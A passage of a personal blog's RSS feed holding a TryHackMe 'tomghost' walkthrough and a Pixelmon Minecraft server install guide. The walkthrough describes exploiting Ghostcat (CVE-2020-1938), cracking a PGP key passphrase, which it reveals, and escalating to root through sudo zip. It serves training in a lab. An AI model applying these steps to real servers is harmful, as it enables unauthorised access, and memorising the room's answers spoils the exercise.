<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="307" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/06/Task-1-Solutions-1024x307.png?resize=1024%2C307" alt="TryHackMe: Thompson Task 1 Solutions" class="wp-image-1148" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=1024%2C307&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=300%2C90&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?resize=768%2C230&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/06/Task-1-Solutions.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<p>The post <a href="https://eric.cc/tryhackme-thompson/">TryHackMe: Thompson</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-thompson/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">487</post-id>	</item>
		<item>
		<title>TryHackMe: tomghost</title>
		<link>https://eric.cc/tryhackme-tomghost/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-tomghost</link>
					<comments>https://eric.cc/tryhackme-tomghost/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Mon, 01 May 2023 00:18:12 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=492</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Introduction Apache Tomcat is an open-source web server that can deploy and run Java-based web applications. In 2020 a vulnerability dubbed GhostCat was discovered, allowing attackers to read or include files from the host system. In this room, TryHackMe tomghost, your goal is to use the GhostCat exploit to read files, gain user access, decrypt [&#8230;]</p>
<p>The post <a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">Apache Tomcat is an open-source web server that can deploy and run Java-based web applications. In 2020 a vulnerability dubbed GhostCat was discovered, allowing attackers to read or include files from the host system. In this room, <a href="https://tryhackme.com/room/tomghost">TryHackMe tomghost</a>, your goal is to use the GhostCat exploit to read files, gain user access, decrypt PGP files, and escalate to root privileges.</p>



<h2 class="wp-block-heading">Information Gathering</h2>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="541" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/14.-Task-1-1024x541.png?resize=1024%2C541" alt="tomghost tasks" class="wp-image-917" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=1024%2C541&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=300%2C158&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?resize=768%2C406&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/14.-Task-1.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Tasks</figcaption></figure>



<p class="wp-block-paragraph">As always, we use our trusty Nmap tool to scan the ports to see what services are running on this machine.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="759" height="377" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/1.-nmap.png?resize=759%2C377" alt="tomghost nmap results" class="wp-image-916" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/1.-nmap.png?w=759&amp;ssl=1 759w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/1.-nmap.png?resize=300%2C149&amp;ssl=1 300w" sizes="(max-width: 759px) 100vw, 759px" /><figcaption class="wp-element-caption">Nmap results</figcaption></figure>



<p class="wp-block-paragraph">It looks like port 8080 is running the vulnerable Apache Tomcat version 9.0.30.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1000" height="716" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=1000%2C716" alt="Tomcat dashboard" class="wp-image-918" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?w=1000&amp;ssl=1 1000w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=300%2C215&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/2.-apache-tomcat.png?resize=768%2C550&amp;ssl=1 768w" sizes="(max-width: 1000px) 100vw, 1000px" /><figcaption class="wp-element-caption">tomcat dashboard</figcaption></figure>



<h2 class="wp-block-heading">Exploitation</h2>



<p class="wp-block-paragraph">Tomcat version 9.0.30 has a vulnerability with Apache JServ Protocol (AJP). <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1938">CVE-2020-1938</a> allows attackers the ability to read and include files on the server because &#8220;Tomcat treats AJP connections as having higher trust&#8221;.</p>



<figure class="wp-block-image size-large is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/4.-searchsploit-1024x234.png?resize=840%2C191" alt="" class="wp-image-921" width="840" height="191" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=1024%2C234&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=300%2C69&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?resize=768%2C176&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/4.-searchsploit.png?w=1413&amp;ssl=1 1413w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">tomcat exploit</figcaption></figure>



<p class="wp-block-paragraph">Somebody already wrote an <a href="https://www.exploit-db.com/exploits/48143">exploit</a> for this vulnerability. After downloading this, we can run the Python script and point it to the web server.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="618" height="633" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/6.-ghostcat.png?resize=618%2C633" alt="Running ghostcat exploit" class="wp-image-922" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/6.-ghostcat.png?w=618&amp;ssl=1 618w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/6.-ghostcat.png?resize=293%2C300&amp;ssl=1 293w" sizes="(max-width: 618px) 100vw, 618px" /><figcaption class="wp-element-caption">tomcat exploit</figcaption></figure>



<p class="wp-block-paragraph">We can see here that there is something hosted on <code>/asdf</code>. It&#8217;s an XML file with metadata included. There is also something in the description that looks like login credentials.  </p>



<h2 class="wp-block-heading">Post Exploitation</h2>



<p class="wp-block-paragraph">Returning to our Nmap scan, we can see that SSH is open on this machine. Let&#8217;s see if we can log into the skyfuck account.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="648" height="526" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/7.-user.txt.png?resize=648%2C526" alt="tomghost user.txt" class="wp-image-923" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/7.-user.txt.png?w=648&amp;ssl=1 648w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/7.-user.txt.png?resize=300%2C244&amp;ssl=1 300w" sizes="(max-width: 648px) 100vw, 648px" /><figcaption class="wp-element-caption">user.txt</figcaption></figure>



<p class="wp-block-paragraph">Changing the directory to Merlin&#8217;s home directory we can find the <code>user.txt</code> flag.</p>



<p class="wp-block-paragraph">Returning to our home directory, we can see a couple of files called <code>credential.pgp</code> and <code>tryhackme.asc</code>. Using a tool like gpg2john we can convert <code>tryhackme.asc</code> into a format that can be interpreted by johntheripper.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="924" height="567" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/8.-gpg2john.png?resize=924%2C567" alt="Decrypting PGP " class="wp-image-924" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?w=924&amp;ssl=1 924w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?resize=300%2C184&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/8.-gpg2john.png?resize=768%2C471&amp;ssl=1 768w" sizes="(max-width: 924px) 100vw, 924px" /><figcaption class="wp-element-caption">cracked .asc and pgp</figcaption></figure>



<p class="wp-block-paragraph">Johntheripper, in combination with the rockyou.txt dictionary file, we can dictionary brute-force the password for the .asc file. </p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="936" height="341" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/9.-passphrase.png?resize=936%2C341" alt="Decrypting PGP " class="wp-image-926" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?w=936&amp;ssl=1 936w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?resize=300%2C109&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/9.-passphrase.png?resize=768%2C280&amp;ssl=1 768w" sizes="(max-width: 936px) 100vw, 936px" /></figure>



<p class="wp-block-paragraph">Using gpg import the <code>tryhackme.asc</code> file and enter the password <strong>alexandru</strong>. It looks like it is an OpenPGP secret key for stuxnet@tryhackme.com</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="638" height="265" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/10.-decrypted.png?resize=638%2C265" alt="PGP contents" class="wp-image-927" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/10.-decrypted.png?w=638&amp;ssl=1 638w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/10.-decrypted.png?resize=300%2C125&amp;ssl=1 300w" sizes="(max-width: 638px) 100vw, 638px" /></figure>



<p class="wp-block-paragraph">We can then decrypt the <code>credential.pgp</code> file and see Merlin&#8217;s login information.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="748" height="151" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/11.-sudo-l.png?resize=748%2C151" alt="Privilege escalation tomghost" class="wp-image-928" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/11.-sudo-l.png?w=748&amp;ssl=1 748w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/11.-sudo-l.png?resize=300%2C61&amp;ssl=1 300w" sizes="(max-width: 748px) 100vw, 748px" /><figcaption class="wp-element-caption">privilege escalation</figcaption></figure>



<p class="wp-block-paragraph">After logging into Merlin&#8217;s account we still do not have access to the root system. However, after running sudo -l we can see that Merlin can run root permissions on the command zip.</p>



<p class="wp-block-paragraph">Using gtfobins, we can see the binary allowing us to run superuser and drop escalated privileged access to the system.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="824" height="208" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/12.-gtfobins.png?resize=824%2C208" alt="Gtfobins results" class="wp-image-929" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?w=824&amp;ssl=1 824w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?resize=300%2C76&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/12.-gtfobins.png?resize=768%2C194&amp;ssl=1 768w" sizes="(max-width: 824px) 100vw, 824px" /><figcaption class="wp-element-caption">gtfobins results</figcaption></figure>



<p class="wp-block-paragraph">Finally, we run the command. Allowing us to be root user.</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="452" height="229" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/13.-root.txt.png?resize=452%2C229" alt="tomghost root.txt" class="wp-image-931" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/13.-root.txt.png?w=452&amp;ssl=1 452w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/13.-root.txt.png?resize=300%2C152&amp;ssl=1 300w" sizes="(max-width: 452px) 100vw, 452px" /><figcaption class="wp-element-caption">root.txt</figcaption></figure>



<p class="wp-block-paragraph">We can finally navigate to the root directory and read out the <code>root.txt</code> flag.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p class="wp-block-paragraph">In conclusion, these exploits only existed because the software inherently trusted these AJP files. Software developers will have to use caution on when to trust anything involving inputs as they may become compromised. </p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="542" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2022/11/15.-Task-1-Solutions-1024x542.png?resize=1024%2C542" alt="tomghost Tasks solutions" class="wp-image-925" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=1024%2C542&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=300%2C159&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?resize=768%2C406&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2022/11/15.-Task-1-Solutions.png?w=1208&amp;ssl=1 1208w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Task Solutions</figcaption></figure>
<p>The post <a href="https://eric.cc/tryhackme-tomghost/">TryHackMe: tomghost</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/tryhackme-tomghost/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">492</post-id>	</item>
		<item>
		<title>Install Pixelmon Minecraft mod on Linux Server</title>
		<link>https://eric.cc/install-pixelmon-server/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=install-pixelmon-server</link>
					<comments>https://eric.cc/install-pixelmon-server/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Wed, 01 Feb 2023 15:45:00 +0000</pubDate>
				<category><![CDATA[Miscellaneous]]></category>
		<category><![CDATA[Minecraft]]></category>
		<category><![CDATA[Pixelmon]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=941</guid>

					<description><![CDATA[<p><a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
<p>Installation guide for downloading Pixelmon with a forge modded Minecraft server. Learn how to install it on a Linux server with no overhead!</p>
<p>The post <a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a><br />
<a href="https://eric.cc">Eric Logan</a></p>

<h2 class="wp-block-heading">Introduction</h2>



<p class="wp-block-paragraph">I have seen plenty of tutorials circulating online on how to install mods on a Minecraft server. Most specifically Pixelmon. To summarize, their solution was to go pay for their <em>proprietary</em> Minecraft hosting/admin panels for ease of installation.</p>



<p class="wp-block-paragraph">This tutorial can be seen as a general guide on installing Forge modded Minecraft servers with the example being Pixelmon for Minecraft Version 1.12.2.</p>



<h2 class="wp-block-heading">Prerequisites</h2>



<p class="wp-block-paragraph">This guide is on how to install the Pixelmon server using Forge Server on a Linux Server</p>



<ul class="wp-block-list">
<li>Operating System:  Ubuntu Linux server</li>



<li><a href="https://www.wikihow.com/Install-Minecraft-Forge">How to download Minecraft 1.12.2 forge client</a></li>



<li><a href="https://pixelmonmod.com/wiki/Installation">How to download Pixelmon mod</a></li>
</ul>



<h2 class="wp-block-heading">Installation</h2>



<p class="wp-block-paragraph">Firstly, we want to create a directory where we want to deploy this Minecraft server. Once that is done, we can change our working directory to it and begin downloading <em>Minecraft-Forge-installer.jar</em> onto the server.</p>



<p class="wp-block-paragraph"><strong>Forge 1.12 server jar download </strong></p>



<p class="wp-block-paragraph"><code>wget https://maven.minecraftforge.net/net/minecraftforge/forge/1.12.2-14.23.5.2860/forge-1.12.2-14.23.5.2860-installer.jar</code></p>



<p class="wp-block-paragraph"><strong>Install forge server</strong></p>



<p class="wp-block-paragraph">Now that that jar file has been successfully downloaded to our server, we can run the following command to start the server installation process.</p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860-installer.jar --installServe</code>r</p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1021" height="173" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=1021%2C173" alt="installing forge server " class="wp-image-970" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?w=1021&amp;ssl=1 1021w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=300%2C51&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_1-2.png?resize=768%2C130&amp;ssl=1 768w" sizes="(max-width: 1021px) 100vw, 1021px" /><figcaption class="wp-element-caption">Installing Forge Server</figcaption></figure>



<p class="wp-block-paragraph"><strong>Troubleshoot</strong> (optional)</p>



<p class="wp-block-paragraph"><code>Command 'java' not found, but can be installed with: error</code></p>



<p class="wp-block-paragraph">Java does not come packaged with new Linux servers. Luckily the error provides a solution for installing java onto the server. I found that OpenJDK version 1.8.0 worked the best with the mods and premade adventure maps. </p>



<p class="wp-block-paragraph"><code>sudo apt install openjdk-8-jre-headless</code></p>



<p class="wp-block-paragraph">Then run the install forge server command again.</p>



<p class="wp-block-paragraph"><strong>Run forge server</strong></p>



<p class="wp-block-paragraph">Time to finally run this thing!</p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860.jar --nogui</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="445" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=1024%2C445" alt="failed to accept Minecraft's EULA" class="wp-image-971" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=300%2C130&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_2-1.png?resize=768%2C334&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Failed to load eula.txt!</figcaption></figure>



<p class="wp-block-paragraph">Now what??</p>



<p class="wp-block-paragraph"><strong>Accept Eula</strong></p>



<p class="wp-block-paragraph"><code>Failed to load eula.txt</code></p>



<p class="wp-block-paragraph">Before a Minecraft server can begin, you will need to accept Mojang&#8217;s EULA agreement. A Eula, standing for End-user license agreement, specifies in detail the rights and restrictions which apply to the use of the software.</p>



<p class="wp-block-paragraph">We can accept it by editing the .txt file in nano.</p>



<ul class="wp-block-list">
<li><code>nano eula</code>     </li>



<li>Change <code>eula=false</code> to <code>eula=true</code></li>



<li>Ctrl+X to save and exit</li>
</ul>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="162" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=1024%2C162" alt="accepting Minecraft's Eula" class="wp-image-972" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=300%2C47&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_3-2.png?resize=768%2C122&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Eula.txt</figcaption></figure>



<p class="wp-block-paragraph"><strong>Run server again </strong></p>



<p class="wp-block-paragraph">This time it will start creating files necessary to run the Minecraft server such as configuration and world files. Now you can install any mods from here or just use it as a Vanilla Minecraft server.</p>



<figure class="wp-block-image size-full is-resized"><img data-recalc-dims="1" loading="lazy" decoding="async" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=840%2C632" alt="initializing pixelmon forge files" class="wp-image-973" width="840" height="632" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?w=1020&amp;ssl=1 1020w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=300%2C226&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_5-1.png?resize=768%2C578&amp;ssl=1 768w" sizes="(max-width: 840px) 100vw, 840px" /><figcaption class="wp-element-caption">Forge Minecraft server directory</figcaption></figure>



<p class="wp-block-paragraph">To install mods, we will need to stop the Minecraft server using the <code>Ctrl + C</code> shortcut.</p>



<p class="wp-block-paragraph"><strong>Pixelmon server jar download </strong></p>



<p class="wp-block-paragraph">Change your working directory into the mods directory.</p>



<p class="wp-block-paragraph"><code>cd mods</code></p>



<p class="wp-block-paragraph">Download Pixelmon server jar from the website.</p>



<p class="wp-block-paragraph"><code>wget https://download.nodecdn.net/containers/reforged/server/release/8.4.3/Pixelmon-1.12.2-8.4.3-server.jar</code></p>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="251" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_6-1024x251.png?resize=1024%2C251" alt="installing pixelmon server.jar in mods directory" class="wp-image-960" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=1024%2C251&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=300%2C73&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?resize=768%2C188&amp;ssl=1 768w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_6.png?w=1026&amp;ssl=1 1026w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Installing PIxelmon server jar</figcaption></figure>



<p class="wp-block-paragraph"><strong>Delete the world folder</strong></p>



<p class="wp-block-paragraph">Deleting the old world file will allow the Pixelmon mod to create Pokemon structures and other necessary items.</p>



<p class="wp-block-paragraph"><code>rm -rf world/</code></p>



<p class="wp-block-paragraph"><strong>Run server again</strong></p>



<p class="wp-block-paragraph"><code>java -jar forge-1.12.2-14.23.5.2860.jar --nogui</code></p>



<figure class="wp-block-image size-full"><img data-recalc-dims="1" loading="lazy" decoding="async" width="1024" height="766" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_7.png?resize=1024%2C766" alt="Running forge server jar again" class="wp-image-961" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?w=1024&amp;ssl=1 1024w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?resize=300%2C224&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_7.png?resize=768%2C575&amp;ssl=1 768w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Initializing PIxelmon server</figcaption></figure>



<h2 class="wp-block-heading">Post Installation</h2>



<p class="wp-block-paragraph"><strong>Join the server from the game client</strong></p>



<p class="wp-block-paragraph">Lastly, join the Minecraft Pixelmon server and enjoy your Pokemon adventure with friends on Minecraft!</p>



<figure class="wp-block-gallery has-nested-images columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex">
<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="509" data-id="978" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=854%2C509" alt="minecraft server list" class="wp-image-978" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=300%2C179&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_10-2.png?resize=768%2C458&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Minecraft server list</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="508" data-id="977" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=854%2C508" alt="picking our starting pokemon pixelmon" class="wp-image-977" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=300%2C178&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_8-1.png?resize=768%2C457&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Starter Pixelmon Pokemon</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="505" data-id="975" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=854%2C505" alt="Minecraft Pokemon" class="wp-image-975" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=300%2C177&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_9-2.png?resize=768%2C454&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Pixelmon Pokemon</figcaption></figure>



<figure class="wp-block-image size-large"><img data-recalc-dims="1" loading="lazy" decoding="async" width="854" height="510" data-id="976" src="https://i0.wp.com/vps-1a659a37.vps.ovh.us/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=854%2C510" alt="Minecraft Pokemon Battle" class="wp-image-976" srcset="https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?w=854&amp;ssl=1 854w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=300%2C179&amp;ssl=1 300w, https://i0.wp.com/eric.cc/wp-content/uploads/2023/01/Screenshot_11-1.png?resize=768%2C459&amp;ssl=1 768w" sizes="(max-width: 854px) 100vw, 854px" /><figcaption class="wp-element-caption">Pixelmon Pokemon Battle</figcaption></figure>
</figure>
<p>The post <a href="https://eric.cc/install-pixelmon-server/">Install Pixelmon Minecraft mod on Linux Server</a> appeared first on <a href="https://eric.cc">Eric Logan</a> written by <a href="https://eric.cc/author/eric/">eric</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://eric.cc/install-pixelmon-server/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">941</post-id>	</item>
		<item>
		<title>TryHackMe: LazyAdmin</title>
		<link>https://eric.cc/tryhackme-lazyadmin/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=tryhackme-lazyadmin</link>
					<comments>https://eric.cc/tryhackme-lazyadmin/#respond</comments>
		
		<dc:creator><![CDATA[eric]]></dc:creator>
		<pubDate>Thu, 01 Dec 2022 15:00:00 +0000</pubDate>
				<category><![CDATA[Write Ups]]></category>
		<category><![CDATA[TryHackMe]]></category>
		<guid isPermaLink="false">https://eric.cc/?p=436</guid>

					<description><![CDATA[<p><a href="https://eric.cc/tryhackme-lazyadmin/">TryHackMe: LazyAdmin</a><br />
<a href="https://eric.cc">Eric Logan</a></p>
